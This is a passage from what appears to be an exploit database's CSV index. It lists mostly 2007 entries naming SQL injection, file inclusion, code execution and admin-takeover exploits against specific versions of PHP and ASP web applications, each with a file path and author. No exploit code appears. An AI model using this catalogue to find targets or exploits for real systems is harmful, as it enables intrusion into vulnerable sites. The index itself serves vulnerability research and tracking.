Execution",2007-02-02,Kacper,php,webapps, -3256,exploits/php/webapps/3256.txt,"dB Masters Curium CMS 1.03 - 'c_id' SQL Injection",2007-02-02,ajann,php,webapps, -3258,exploits/php/webapps/3258.txt,"phpBB ezBoard Converter 0.2 - 'ezconvert_dir' Remote File Inclusion",2007-02-02,"Mehmet Ince",php,webapps, -3259,exploits/php/webapps/3259.pl,"phpBB++ Build 100 - 'phpbb_root_path' Remote File Inclusion",2007-02-02,"Mehmet Ince",php,webapps, -3261,exploits/php/webapps/3261.txt,"Photo Galerie Standard 1.1 - 'view.php' SQL Injection",2007-02-03,ajann,php,webapps, -3262,exploits/php/webapps/3262.php,"Woltlab Burning Board Lite 1.0.2pl3e - 'pms.php' SQL Injection",2007-02-03,rgod,php,webapps, -3263,exploits/php/webapps/3263.txt,"KDPics 1.11 - 'exif.php?lib_path' Remote File Inclusion",2007-02-03,AsTrex,php,webapps, -3266,exploits/php/webapps/3266.txt,"Flip 2.01 final - 'previewtheme.php?inc_path' Remote File Inclusion",2007-02-04,GoLd_M,php,webapps, -3267,exploits/php/webapps/3267.txt,"Geeklog 2 - 'BaseView.php' Remote File Inclusion",2007-02-05,GoLd_M,php,webapps, -3268,exploits/php/webapps/3268.txt,"SMA-DB 0.3.9 - 'settings.php' Remote File Inclusion",2007-02-05,"ThE dE@Th",php,webapps, -3270,exploits/php/webapps/3270.pl,"Categories hierarchy phpBB Mod 2.1.2 - 'phpbb_root_path' Remote File Inclusion",2007-02-05,"Mehmet Ince",php,webapps, -3271,exploits/php/webapps/3271.php,"GGCMS 1.1.0 RC1 - Remote Code Execution",2007-02-05,Kacper,php,webapps, -3275,exploits/php/webapps/3275.txt,"LightRO CMS 1.0 - 'inhalt.php' Remote File Inclusion",2007-02-06,ajann,php,webapps, -3278,exploits/php/webapps/3278.txt,"Kisisel Site 2007 - 'tr' SQL Injection",2007-02-06,cl24zy,php,webapps, -3280,exploits/php/webapps/3280.txt,"AgerMenu 0.01 - 'top.inc.php?rootdir' Remote File Inclusion",2007-02-07,GoLd_M,php,webapps, -3281,exploits/php/webapps/3281.txt,"WebMatic 2.6 - 'index_album.php' Remote File Inclusion",2007-02-07,MadNet,php,webapps, -3282,exploits/php/webapps/3282.pl,"Advanced Poll 2.0.5-dev - Remote Admin Session Generator",2007-02-07,diwou,php,webapps, -3283,exploits/php/webapps/3283.txt,"otscms 2.1.5 - SQL Injection / Cross-Site Scripting",2007-02-07,GregStar,php,webapps, -3284,exploits/php/webapps/3284.txt,"Maian Recipe 1.0 - 'path_to_folder' Remote File Inclusion",2007-02-07,Denven,php,webapps, -3285,exploits/php/webapps/3285.html,"Site-Assistant 0990 - 'paths[version]' Remote File Inclusion",2007-02-08,ajann,php,webapps, -3286,exploits/php/webapps/3286.asp,"LightRO CMS 1.0 - 'index.php?projectid' SQL Injection",2007-02-08,ajann,php,webapps, -3287,exploits/php/webapps/3287.asp,"LushiNews 1.01 - 'comments.php' SQL Injection",2007-02-08,ajann,php,webapps, -3288,exploits/php/webapps/3288.asp,"LushiWarPlaner 1.0 - 'register.php' SQL Injection",2007-02-08,ajann,php,webapps, -3292,exploits/php/webapps/3292.txt,"OPENi-CMS Site Protection Plugin - Remote File Inclusion",2007-02-11,y3dips,php,webapps, -3295,exploits/asp/webapps/3295.txt,"philboard 1.14 - 'philboard_forum.asp' SQL Injection",2007-02-12,"Mehmet Ince",asp,webapps, -3297,exploits/php/webapps/3297.html,"AT Contenator 1.0 - 'Root_To_Script' Remote File Inclusion",2007-02-13,ajann,php,webapps, -3298,exploits/php/webapps/3298.pl,"Xaran CMS 2.0 - 'xarancms_haupt.php' SQL Injection",2007-02-13,ajann,php,webapps, -3299,exploits/php/webapps/3299.pl,"PHPCC 4.2 Beta - 'nickpage.php?npid' SQL Injection",2007-02-13,ajann,php,webapps, -3300,exploits/php/webapps/3300.pl,"Advanced Poll 2.0.5-dev - Remote Code Execution",2007-02-13,diwou,php,webapps, -3301,exploits/asp/webapps/3301.txt,"PollMentor 2.0 - 'pollmentorres.asp?id' SQL Injection",2007-02-13,SaO,asp,webapps, -3305,exploits/php/webapps/3305.txt,"nabopoll 1.2 - Remote Unprotected Admin Section",2007-02-13,sn0oPy,php,webapps, -3309,exploits/php/webapps/3309.txt,"Jupiter CMS 1.1.5 - '/index.php' Local/Remote File Inclusion",2007-02-14,DarkFig,php,webapps, -3310,exploits/php/webapps/3310.php,"Jupiter CMS 1.1.5 - 'Client-IP' SQL Injection",2007-02-14,DarkFig,php,webapps, -3311,exploits/php/webapps/3311.php,"Jupiter CMS 1.1.5 - Arbitrary File Upload",2007-02-14,DarkFig,php,webapps, -3312,exploits/php/webapps/3312.pl,"Drupal < 5.1 - Post Comments Remote Command Execution",2007-02-15,str0ke,php,webapps, -3313,exploits/php/webapps/3313.pl,"Drupal < 4.7.6 - Post Comments Remote Command Execution",2007-02-15,str0ke,php,webapps, -3314,exploits/php/webapps/3314.txt,"ZebraFeeds 1.0 - 'zf_path' Remote File Inclusion",2007-02-15,"ThE dE@Th",php,webapps, -3315,exploits/php/webapps/3315.txt,"nabopoll 1.2 - 'survey.inc.php?path' Remote File Inclusion",2007-02-15,Cr@zy_King,php,webapps, -3317,exploits/asp/webapps/3317.txt,"CodeAvalanche News 1.x - 'CAT_ID' SQL Injection",2007-02-15,beks,asp,webapps, -3318,exploits/asp/webapps/3318.txt,"Aktueldownload Haber scripti - 'id' SQL Injection",2007-02-15,"Mehmet Ince",asp,webapps, -3321,exploits/asp/webapps/3321.txt,"Snitz Forums 2000 3.1 SR4 - 'pop_profile.asp' SQL Injection",2007-02-16,"Mehmet Ince",asp,webapps, -3322,exploits/php/webapps/3322.html,"VS-News-System 1.2.1 - 'newsordner' Remote File Inclusion",2007-02-16,ajann,php,webapps, -3323,exploits/php/webapps/3323.html,"VS-Link-Partner 2.1 - 'script_pfad' Remote File Inclusion",2007-02-16,ajann,php,webapps, -3324,exploits/php/webapps/3324.txt,"Htaccess Passwort Generator 1.1 - 'ht_pfad' Remote File Inclusion",2007-02-16,kezzap66345,php,webapps, -3325,exploits/php/webapps/3325.pl,"webSPELL 4.01.02 - 'showonly' Blind SQL Injection",2007-02-16,DNX,php,webapps, -3326,exploits/php/webapps/3326.txt,"Vivvo Article Manager 3.4 - 'root' Local File Inclusion",2007-02-16,Snip0r,php,webapps, -3327,exploits/php/webapps/3327.txt,"XLAtunes 0.1 - 'album' SQL Injection",2007-02-17,Bl0od3r,php,webapps, -3328,exploits/php/webapps/3328.html,"S-Gastebuch 1.5.3 - 'gb_pfad' Remote File Inclusion",2007-02-18,ajann,php,webapps, -3332,exploits/php/webapps/3332.pl,"Xpression News 1.0.1 - 'archives.php' Remote File Disclosure",2007-02-18,r0ut3r,php,webapps, -3334,exploits/php/webapps/3334.asp,"PHP-Nuke Module Emporium 2.3.0 - SQL Injection",2007-02-19,ajann,php,webapps, -3336,exploits/php/webapps/3336.txt,"Ultimate Fun Book 1.02 - 'function.php' Remote File Inclusion",2007-02-20,kezzap66345,php,webapps, -3337,exploits/php/webapps/3337.php,"NukeSentinel 2.5.05 - 'nsbypass.php' Blind SQL Injection",2007-02-20,DarkFig,php,webapps, -3338,exploits/php/webapps/3338.php,"NukeSentinel 2.5.05 - 'nukesentinel.php' File Disclosure",2007-02-20,DarkFig,php,webapps, -3339,exploits/asp/webapps/3339.txt,"Online Web Building 2.0 - 'id' SQL Injection",2007-02-20,"Mehmet Ince",asp,webapps, -3344,exploits/php/webapps/3344.pl,"PHP-Nuke 8.0 Final - 'INSERT' Blind SQL Injection (MySQL)",2007-02-20,krasza,php,webapps, -3345,exploits/php/webapps/3345.pl,"PHP-Nuke 8.0 Final - 'INSERT' SQL Injection",2007-02-20,krasza,php,webapps, -3346,exploits/php/webapps/3346.pl,"PHP-Nuke 8.0 Final - HTTP Referers SQL Injection",2007-02-20,krasza,php,webapps, -3348,exploits/php/webapps/3348.txt,"SendStudio 2004.14 - 'ROOTDIR' Remote File Inclusion",2007-02-20,K-159,php,webapps, -3351,exploits/php/webapps/3351.pl,"webSPELL 4.01.02 - 'topic' SQL Injection",2007-02-21,DNX,php,webapps, -3352,exploits/php/webapps/3352.php,"Connectix Boards 0.7 - 'p_skin' Multiple Vulnerabilities",2007-02-21,DarkFig,php,webapps, -3353,exploits/php/webapps/3353.txt,"DBImageGallery 1.2.2 - 'donsimg_base_path' Remote File Inclusion",2007-02-21,Denven,php,webapps, -3354,exploits/php/webapps/3354.txt,"DBGuestbook 1.1 - 'dbs_base_path' Remote File Inclusion",2007-02-21,Denven,php,webapps, -3355,exploits/php/webapps/3355.php,"Nabopoll 1.2 - 'result.php?surv' Blind SQL Injection",2007-02-21,s0cratex,php,webapps, -3357,exploits/php/webapps/3357.txt,"DZCP (deV!L_z Clanportal) 1.4.5 - Remote File Disclosure",2007-02-21,Kiba,php,webapps, -3360,exploits/php/webapps/3360.txt,"FlashGameScript 1.5.4 - 'index.php?func' Remote File Inclusion",2007-02-22,JuMp-Er,php,webapps, -3361,exploits/php/webapps/3361.txt,"eFiction 3.1.1 - 'path_to_smf' Remote File Inclusion",2007-02-22,"ThE dE@Th",php,webapps, -3365,exploits/php/webapps/3365.txt,"FCRing 1.31 - 'fcring.php?s_fuss' Remote File Inclusion",2007-02-23,kezzap66345,php,webapps, -3366,exploits/php/webapps/3366.txt,"Sinapis 2.2 Gastebuch - 'sinagb.php?fuss' Remote File Inclusion",2007-02-23,kezzap66345,php,webapps, -3367,exploits/php/webapps/3367.txt,"Sinapis Forum 2.2 - 'sinapis.php?fuss' Remote File Inclusion",2007-02-23,kezzap66345,php,webapps, -3370,exploits/php/webapps/3370.pl,"Extreme phpBB 3.0.1 - 'functions.php' Remote File Inclusion",2007-02-24,"Mehmet Ince",php,webapps, -3371,exploits/php/webapps/3371.php,"Coppermine Photo Gallery 1.3.x - Blind SQL Injection",2007-02-24,s0cratex,php,webapps, -3372,exploits/php/webapps/3372.php,"CS-Gallery 2.0 - 'index.php?album' Remote File Inclusion",2007-02-24,burncycle,php,webapps, -3373,exploits/php/webapps/3373.pl,"phpBB Module NoMoKeTos Rules 0.0.1 - Remote File Inclusion",2007-02-24,bd0rk,php,webapps, -3374,exploits/php/webapps/3374.txt,"PHP-MIP 0.1 - 'top.php?laypath' Remote File Inclusion",2007-02-25,GoLd_M,php,webapps, -3379,exploits/php/webapps/3379.php,"STWC-Counter 3.4.0 - 'downloadcounter.php' Remote File Inclusion",2007-02-26,burncycle,php,webapps, -3382,exploits/php/webapps/3382.txt,"Admin Phorum 3.3.1a - 'del.php?include_path' Remote File Inclusion",2007-02-27,GoLd_M,php,webapps, -3387,exploits/php/webapps/3387.php,"vBulletin 3.6.4 - 'inlinemod.php?postids' SQL Injection",2007-02-28,rgod,php,webapps, -3390,exploits/asp/webapps/3390.txt,"Angel Lms 7.1 - 'default.asp?id' SQL Injection",2007-03-01,"Craig Heffner",asp,webapps, -3393,exploits/php/webapps/3393.php,"phpMyFAQ 1.6.7 - SQL Injection / Command Execution",2007-03-01,elgCrew,php,webapps, -39567,exploits/php/webapps/39567.txt,"Monstra CMS 3.0.3 - Multiple Vulnerabilities",2016-03-16,"Sarim Kiani",php,webapps,80 -3398,exploits/php/webapps/3398.txt,"Mani Stats Reader 1.2 - 'ipath' Remote File Inclusion",2007-03-02,mozi,php,webapps, -3400,exploits/php/webapps/3400.pl,"webSPELL 4.01.02 - Multiple SQL Injections",2007-03-02,DNX,php,webapps, -3402,exploits/php/webapps/3402.php,"webSPELL 4.01.02 - PHP Remote Code Execution",2007-03-03,DarkFig,php,webapps, -3403,exploits/php/webapps/3403.php,"Rigter Portal System (RPS) 6.2 - Blind SQL Injection",2007-03-04,s0cratex,php,webapps, -3406,exploits/php/webapps/3406.pl,"News-Letterman 1.1 - 'eintrag.php?sqllog' Remote File Inclusion",2007-03-04,bd0rk,php,webapps, -3408,exploits/php/webapps/3408.pl,"AJ Auction Pro - 'subcat.php' SQL Injection",2007-03-04,ajann,php,webapps, -3409,exploits/php/webapps/3409.html,"AJ Dating 1.0 - 'view_profile.php' SQL Injection",2007-03-04,ajann,php,webapps, -3410,exploits/php/webapps/3410.html,"AJ Classifieds 1.0 - 'postingdetails.php' SQL Injection",2007-03-04,ajann,php,webapps, -3411,exploits/php/webapps/3411.pl,"AJ Forum 1.0 - 'topic_title.php' SQL Injection",2007-03-04,ajann,php,webapps, -3412,exploits/cgi/webapps/3412.txt,"RRDBrowse 1.6 - Arbitrary File Disclosure",2007-03-04,"Sebastian Wolfgarten",cgi,webapps, -3416,exploits/php/webapps/3416.pl,"Links Management Application 1.0 - 'lcnt' SQL Injection",2007-03-05,ajann,php,webapps, -3423,exploits/php/webapps/3423.txt,"PHP-Nuke Module PostGuestbook 0.6.1 - 'tpl_pgb_moddir' Remote File Inclusion",2007-03-07,GoLd_M,php,webapps, -3428,exploits/php/webapps/3428.txt,"Flat Chat 2.0 - 'include online.txt' Remote Code Execution",2007-03-07,Dj7xpl,php,webapps, -3435,exploits/php/webapps/3435.txt,"netForo! 0.1 - 'down.php?file_to_download' Remote File Disclosure",2007-03-08,GoLd_M,php,webapps, -3436,exploits/php/webapps/3436.txt,"WEBO (Web ORGanizer) 1.0 - 'baseDir' Remote File Inclusion",2007-03-08,K-159,php,webapps, -3437,exploits/asp/webapps/3437.txt,"GaziYapBoz Game Portal - 'kategori.asp' SQL Injection",2007-03-08,CyberGhost,asp,webapps, -3438,exploits/php/webapps/3438.txt,"Magic CMS 4.2.747 - 'mysave.php' Remote File Inclusion",2007-03-08,DNX,php,webapps, -3443,exploits/php/webapps/3443.txt,"PMB Services 3.0.13 - Multiple Remote File Inclusions",2007-03-09,K-159,php,webapps, -3447,exploits/php/webapps/3447.txt,"Grayscale Blog 0.8.0 - Security Bypass / SQL Injection / Cross-Site Scripting",2007-03-09,Omni,php,webapps, -3448,exploits/php/webapps/3448.txt,"work system E-Commerce 3.0.5 - Remote File Inclusion",2007-03-10,"Rodrigo Duarte",php,webapps, -3449,exploits/php/webapps/3449.txt,"HC Newssystem 1.0-1.4 - 'index.php?ID' SQL Injection",2007-03-10,WiLdBoY,php,webapps, -3450,exploits/php/webapps/3450.php,"NukeSentinel 2.5.06 - SQL Injection",2007-03-10,DarkFig,php,webapps, -3454,exploits/php/webapps/3454.pl,"PostNuke Module phgstats 0.5 - 'phgdir' Remote File Inclusion",2007-03-11,bd0rk,php,webapps, -3455,exploits/php/webapps/3455.html,"JobSitePro 1.0 - 'search.php' SQL Injection",2007-03-11,ajann,php,webapps, -3456,exploits/php/webapps/3456.pl,"Top Auction 1.0 - 'viewcat.php' SQL Injection",2007-03-11,ajann,php,webapps, -3457,exploits/php/webapps/3457.pl,"SonicMailer Pro 3.2.3 - 'index.php' SQL Injection",2007-03-11,ajann,php,webapps, -3458,exploits/php/webapps/3458.txt,"AssetMan 2.4a - 'download_pdf.php' Remote File Disclosure",2007-03-11,"BorN To K!LL",php,webapps, -3459,exploits/php/webapps/3459.txt,"cPanel 10.9.x - 'Fantastico' Local File Inclusion",2007-03-11,"cyb3rt & 020",php,webapps, -3465,exploits/php/webapps/3465.txt,"OES (Open Educational System) 0.1beta - Remote File Inclusion",2007-03-12,K-159,php,webapps, -3466,exploits/asp/webapps/3466.txt,"BP Blog 7.0 - 'layout' SQL Injection",2007-03-12,BeyazKurt,asp,webapps, -3467,exploits/php/webapps/3467.txt,"GestArt Beta 1 - 'aide.php?aide' Remote File Inclusion",2007-03-13,Dj7xpl,php,webapps, -3468,exploits/php/webapps/3468.txt,"MySQL Commander 2.7 - 'home' Remote File Inclusion",2007-03-13,K-159,php,webapps, -3469,exploits/asp/webapps/3469.txt,"X-ice News System 1.0 - 'devami.asp?id' SQL Injection",2007-03-13,CyberGhost,asp,webapps, -3470,exploits/asp/webapps/3470.html,"JGBBS 3.0beta1 - 'search.asp?author' SQL Injection",2007-03-13,WiLdBoY,asp,webapps, -3471,exploits/php/webapps/3471.txt,"Activist Mobilization Platform (AMP) 3.2 - Remote File Inclusion",2007-03-13,the_day,php,webapps, -3472,exploits/php/webapps/3472.txt,"CARE2X 1.1 - 'ROOT_PATH' Remote File Inclusion",2007-03-13,the_day,php,webapps, -3473,exploits/php/webapps/3473.txt,"WebCreator 0.2.6-rc3 - 'moddir' Remote File Inclusion",2007-03-13,the_day,php,webapps, -3476,exploits/php/webapps/3476.pl,"Zomplog 3.7.6 (Windows x86) - Local File Inclusion",2007-03-14,Bl0od3r,php,webapps, -3477,exploits/php/webapps/3477.html,"WSN Guest 1.21 - 'id' SQL Injection",2007-03-14,WiLdBoY,php,webapps, -3478,exploits/php/webapps/3478.html,"Dayfox Blog 4 - 'postpost.php' Remote Code Execution",2007-03-14,Dj7xpl,php,webapps, -3481,exploits/asp/webapps/3481.html,"Orion-Blog 2.0 - Remote Authentication Bypass",2007-03-15,WiLdBoY,asp,webapps, -3483,exploits/php/webapps/3483.pl,"Woltlab Burning Board 2.x - 'usergroups.php' SQL Injection",2007-03-15,x666,php,webapps, -3484,exploits/php/webapps/3484.txt,"WebLog - 'index.php' Remote File Disclosure",2007-03-15,Dj7xpl,php,webapps, -3485,exploits/php/webapps/3485.txt,"Company WebSite Builder PRO 1.9.8 - 'INCLUDE_PATH' Remote File Inclusion",2007-03-15,the_day,php,webapps, -3486,exploits/php/webapps/3486.txt,"Groupit 2.00b5 - 'c_basepath' Remote File Inclusion",2007-03-15,the_day,php,webapps, -3487,exploits/php/webapps/3487.pl,"CcMail 1.0.1 - 'functions_dir' Remote File Inclusion",2007-03-15,Crackers_Child,php,webapps, -3489,exploits/php/webapps/3489.txt,"creative Guestbook 1.0 - Multiple Vulnerabilities",2007-03-15,Dj7xpl,php,webapps, -3490,exploits/php/webapps/3490.txt,"wbblog - Cross-Site Scripting / SQL Injection",2007-03-15,"Mehmet Ince",php,webapps, -3492,exploits/php/webapps/3492.txt,"WebCalendar 0.9.45 - 'includedir' Remote File Inclusion",2007-03-15,Drackanz,php,webapps, -3493,exploits/asp/webapps/3493.txt,"Absolute Image Gallery 2.0 - 'gallery.asp?categoryId' SQL Injection",2007-03-15,WiLdBoY,asp,webapps, -3494,exploits/php/webapps/3494.txt,"McGallery 0.5b - 'download.php' Arbitrary File Download",2007-03-15,Piker,php,webapps, -3496,exploits/php/webapps/3496.php,"PHP-Stats 0.1.9.1b - 'PC-REMOTE-ADDR' SQL Injection",2007-03-16,rgod,php,webapps, -3497,exploits/php/webapps/3497.php,"PHP-Stats 0.1.9.1b - 'ip' SQL Injection",2007-03-16,rgod,php,webapps, -3498,exploits/php/webapps/3498.txt,"Creative Files 1.2 - 'kommentare.php' SQL Injection",2007-03-16,"Mehmet Ince",php,webapps, -3500,exploits/php/webapps/3500.html,"Particle Blogger 1.2.0 - 'post.php?postid' SQL Injection",2007-03-16,WiLdBoY,php,webapps, -3501,exploits/php/webapps/3501.txt,"PHP DB Designer 1.02 - Remote File Inclusion",2007-03-16,GoLd_M,php,webapps, -3502,exploits/php/webapps/3502.php,"PHP-Stats 0.1.9.1b - 'PHP-stats-options.php' Command Execution",2007-03-17,rgod,php,webapps, -3503,exploits/php/webapps/3503.txt,"MPM Chat 2.5 - 'view.php?logi' Local File Inclusion",2007-03-17,GoLd_M,php,webapps, -3504,exploits/php/webapps/3504.pl,"Active PHP Bookmark Notes 0.2.5 - Remote File Inclusion",2007-03-17,GoLd_M,php,webapps, -3505,exploits/php/webapps/3505.php,"Net Portal Dynamic System (NPDS) 5.10 - Remote Code Execution (1)",2007-03-18,DarkFig,php,webapps, -3506,exploits/php/webapps/3506.html,"Guestbara 1.2 - Change Admin Login and Password",2007-03-18,Kacper,php,webapps, -3507,exploits/php/webapps/3507.pl,"ScriptMagix FAQ Builder 2.0 - 'index.php' SQL Injection",2007-03-18,ajann,php,webapps, -3508,exploits/php/webapps/3508.txt,"Moodle 1.5.2 - 'moodledata' Remote Session Disclosure",2007-03-18,xSh,php,webapps, -3509,exploits/php/webapps/3509.pl,"ScriptMagix Jokes 2.0 - 'index.php?catid' SQL Injection",2007-03-18,ajann,php,webapps, -3510,exploits/php/webapps/3510.pl,"ScriptMagix Recipes 2.0 - 'index.php?catid' SQL Injection",2007-03-18,ajann,php,webapps, -3511,exploits/php/webapps/3511.pl,"ScriptMagix Photo Rating 2.0 - SQL Injection",2007-03-18,ajann,php,webapps, -3512,exploits/php/webapps/3512.txt,"PHP-Nuke - 'iframe.php' Remote File Inclusion",2007-03-18,"Cold Zero",php,webapps, -3513,exploits/php/webapps/3513.php,"Katalog Plyt Audio (pl) 1.0 - SQL Injection",2007-03-18,Kacper,php,webapps, -3515,exploits/php/webapps/3515.pl,"ScriptMagix Lyrics 2.0 - 'index.php?recid' SQL Injection",2007-03-19,ajann,php,webapps, -3516,exploits/php/webapps/3516.php,"MetaForum 0.513 Beta - Arbitrary File Upload",2007-03-19,Gu1ll4um3r0m41n,php,webapps, -3518,exploits/php/webapps/3518.pl,"PHP-Nuke Module splattforum 4.0 RC1 - Local File Inclusion",2007-03-19,GoLd_M,php,webapps, -3519,exploits/php/webapps/3519.txt,"phpBB Minerva Mod 2.0.21 build 238a - SQL Injection",2007-03-19,"Mehmet Ince",php,webapps, -3520,exploits/asp/webapps/3520.txt,"NetVIOS Portal - 'page.asp' SQL Injection",2007-03-19,parad0x,asp,webapps, -3521,exploits/php/webapps/3521.pl,"pragmaMX Module Landkarten 2.1 (Windows) - Local File Inclusion",2007-03-19,bd0rk,php,webapps, -3522,exploits/php/webapps/3522.pl,"GeBlog 0.1 (Windows) - GLOBALS[tplname] Local File Inclusion",2007-03-20,GoLd_M,php,webapps, -3524,exploits/php/webapps/3524.txt,"PHP-Nuke Module htmltonuke 2.0alpha - 'htmltonuke.php' Remote File Inclusion",2007-03-20,"Cold Zero",php,webapps, -3528,exploits/php/webapps/3528.pl,"PHPRaid < 3.0.7 - 'rss.php?PHPraid_dir' Remote File Inclusion",2007-03-20,"Cold Zero",php,webapps, -3530,exploits/php/webapps/3530.pl,"Monster Top List 1.4.2 - 'functions.php?root_path' Remote File Inclusion",2007-03-20,fluffy_bunny,php,webapps, -3532,exploits/php/webapps/3532.txt,"study planner (studiewijzer) 0.15 - Remote File Inclusion",2007-03-21,K-159,php,webapps, -3533,exploits/php/webapps/3533.txt,"Digital Eye CMS 0.1.1b - 'module.php' Remote File Inclusion",2007-03-21,"Cold Zero",php,webapps, -3534,exploits/asp/webapps/3534.txt,"Active Link Engine - 'default.asp?catid' SQL Injection",2007-03-21,CyberGhost,asp,webapps, -3536,exploits/asp/webapps/3536.txt,"Active Photo Gallery - 'catid' SQL Injection",2007-03-21,CyberGhost,asp,webapps, -3538,exploits/php/webapps/3538.txt,"PHP-revista 1.1.2 - Multiple SQL Injections",2007-03-21,"Cold Zero",php,webapps, -3539,exploits/php/webapps/3539.txt,"Mambo Component nfnaddressbook 0.4 - Remote File Inclusion",2007-03-21,"Cold Zero",php,webapps, -3542,exploits/php/webapps/3542.txt,"ClassWeb 2.0.3 - 'BASE' Remote File Inclusion",2007-03-22,GoLd_M,php,webapps, -3543,exploits/php/webapps/3543.pl,"PortailPhp 2.0 - 'idnews' SQL Injection",2007-03-22,"Mehmet Ince",php,webapps, -3545,exploits/php/webapps/3545.txt,"Lms 1.8.9 - Vala Remote File Inclusion",2007-03-22,Kacper,php,webapps, -3546,exploits/asp/webapps/3546.txt,"AspWebCalendar 4.5 - 'eventid' SQL Injection",2007-03-22,parad0x,asp,webapps, -3548,exploits/php/webapps/3548.pl,"RoseOnlineCMS 3 beta2 - 'op' Local File Inclusion",2007-03-23,GoLd_M,php,webapps, -3549,exploits/asp/webapps/3549.txt,"Active Trade 2 - 'catid' SQL Injection",2007-03-23,CyberGhost,asp,webapps, -3550,exploits/asp/webapps/3550.txt,"ActiveBuyandSell 6.2 - 'buyersend.asp?catid' SQL Injection",2007-03-23,CyberGhost,asp,webapps, -3551,exploits/asp/webapps/3551.txt,"Active Auction Pro 7.1 - 'default.asp?catid' SQL Injection",2007-03-23,CyberGhost,asp,webapps, -3552,exploits/php/webapps/3552.txt,"Philex 0.2.3 - Remote File Inclusion / File Disclosure",2007-03-23,GoLd_M,php,webapps, -3556,exploits/asp/webapps/3556.html,"Active NewsLetter 4.3 - 'ViewNewspapers.asp' SQL Injection",2007-03-23,ajann,asp,webapps, -3557,exploits/php/webapps/3557.txt,"Joomla! / Mambo Component SWmenu 4.0 - Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps, -3558,exploits/asp/webapps/3558.html,"eWebquiz 8 - 'eWebQuiz.asp' SQL Injection",2007-03-23,ajann,asp,webapps, -3560,exploits/php/webapps/3560.txt,"Joomla! Component Joomlaboard 1.1.1 - 'sbp' Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps, -3562,exploits/php/webapps/3562.txt,"Net-Side.net CMS - 'index.php?cms' Remote File Inclusion",2007-03-24,Sharingan,php,webapps, -3563,exploits/php/webapps/3563.txt,"ttCMS 4 - 'ez_sql.php?lib_path' Remote File Inclusion",2007-03-24,Kacper,php,webapps, -3564,exploits/php/webapps/3564.pl,"Joomla! Component Car Manager 1.1 - SQL Injection",2007-03-24,ajann,php,webapps, -3565,exploits/php/webapps/3565.pl,"Joomla! Component RWCards 2.4.3 - SQL Injection",2007-03-24,ajann,php,webapps, -3567,exploits/php/webapps/3567.pl,"Mambo Module Flatmenu 1.07 - Remote File Inclusion",2007-03-25,"Cold Zero",php,webapps, -3568,exploits/php/webapps/3568.txt,"Free Image Hosting 2.0 - 'AD_BODY_TEMP' Remote File Inclusion",2007-03-25,Crackers_Child,php,webapps, -3569,exploits/php/webapps/3569.pl,"PBlang 4.66z - Remote Create Admin",2007-03-25,Hessam-x,php,webapps, -3574,exploits/php/webapps/3574.pl,"PBlang 4.66z - Remote Code Execution",2007-03-25,Hessam-x,php,webapps, -3580,exploits/php/webapps/3580.pl,"IceBB 1.0-rc5 - Remote Create Admin",2007-03-26,Hessam-x,php,webapps, -3581,exploits/php/webapps/3581.pl,"IceBB 1.0-rc5 - Remote Code Execution",2007-03-26,Hessam-x,php,webapps, -3582,exploits/php/webapps/3582.pl,"PHP-Nuke Module AddressBook 1.2 - Local File Inclusion",2007-03-26,bd0rk,php,webapps, -3583,exploits/php/webapps/3583.txt,"C-Arbre 0.6PR7 - 'ROOT_PATH' Remote File Inclusion",2007-03-26,K-159,php,webapps, -3588,exploits/php/webapps/3588.pl,"XOOPS module Articles 1.02 - 'print.php?id' SQL Injection",2007-03-27,WiLdBoY,php,webapps, -3590,exploits/php/webapps/3590.html,"Joomla! Component D4JeZine 2.8 - Blind SQL Injection",2007-03-27,ajann,php,webapps, -3591,exploits/php/webapps/3591.txt,"PHP-Nuke Module Eve-Nuke 0.1 - 'mysql.php' Remote File Inclusion",2007-03-27,"ThE TiGeR",php,webapps, -3592,exploits/php/webapps/3592.html,"Web Content System 2.7.1 - Remote File Inclusion",2007-03-27,kezzap66345,php,webapps, -3594,exploits/php/webapps/3594.pl,"XOOPS module Articles 1.03 - 'index.php?cat_id' SQL Injection",2007-03-28,ajann,php,webapps, -3596,exploits/php/webapps/3596.txt,"iPhotoAlbum 1.1 - 'header.php' Remote File Inclusion",2007-03-28,GoLd_M,php,webapps, -3597,exploits/php/webapps/3597.pl,"XOOPS Module Friendfinder 3.3 - 'view.php?id' SQL Injection",2007-03-28,ajann,php,webapps, -3598,exploits/php/webapps/3598.txt,"MangoBery CMS 0.5.5 - 'quotes.php' Remote File Inclusion",2007-03-28,kezzap66345,php,webapps, -3599,exploits/php/webapps/3599.txt,"CodeBB 1.0 Beta 2 - 'phpbb_root_path' Remote File Inclusion",2007-03-28,"Alkomandoz Hacker",php,webapps, -3600,exploits/php/webapps/3600.txt,"Softerra Time-Assistant 6.2 - 'inc_dir' Remote File Inclusion",2007-03-29,K-159,php,webapps, -3601,exploits/php/webapps/3601.pl,"sBLOG 0.7.3 Beta - '/inc/lang.php' Local File Inclusion",2007-03-29,GoLd_M,php,webapps, -3603,exploits/php/webapps/3603.pl,"XOOPS Module MyAds Bug Fix 2.04jp - 'index.php' SQL Injection",2007-03-29,ajann,php,webapps, -3605,exploits/php/webapps/3605.php,"Picture-Engine 1.2.0 - 'wall.php?cat' SQL Injection",2007-03-29,Kacper,php,webapps, -3607,exploits/php/webapps/3607.txt,"Kaqoo Auction - 'install_root' Multiple Remote File Inclusions",2007-03-29,"ThE dE@Th",php,webapps, -3608,exploits/php/webapps/3608.txt,"Advanced Login 0.7 - 'root' Remote File Inclusion",2007-03-29,Bithedz,php,webapps, -3611,exploits/php/webapps/3611.txt,"JC URLShrink 1.3.1 - Remote Code Execution",2007-03-30,Dj7xpl,php,webapps, -3612,exploits/php/webapps/3612.pl,"XOOPS Module Repository - 'viewcat.php' SQL Injection",2007-03-30,ajann,php,webapps, -3613,exploits/php/webapps/3613.txt,"phpBB MOD Forum picture and META tags 1.7 - Remote File Inclusion",2007-03-30,bd0rk,php,webapps, -3614,exploits/php/webapps/3614.txt,"JSBoard 2.0.10 - 'login.php?table' Local File Inclusion",2007-03-30,GoLd_M,php,webapps, -3618,exploits/php/webapps/3618.html,"XOOPS Module Lykos Reviews 1.00 - 'index.php' SQL Injection",2007-03-31,ajann,php,webapps, -3619,exploits/php/webapps/3619.pl,"XOOPS Module Library - 'viewcat.php' SQL Injection",2007-03-31,ajann,php,webapps, -3620,exploits/php/webapps/3620.pl,"XOOPS Module Core - 'viewcat.php' SQL Injection",2007-03-31,ajann,php,webapps, -3621,exploits/php/webapps/3621.pl,"XOOPS Module Tutoriais - 'viewcat.php' SQL Injection",2007-03-31,ajann,php,webapps, -3622,exploits/php/webapps/3622.php,"WinMail Server 4.4 build 1124 - 'WebMail' Remote Add 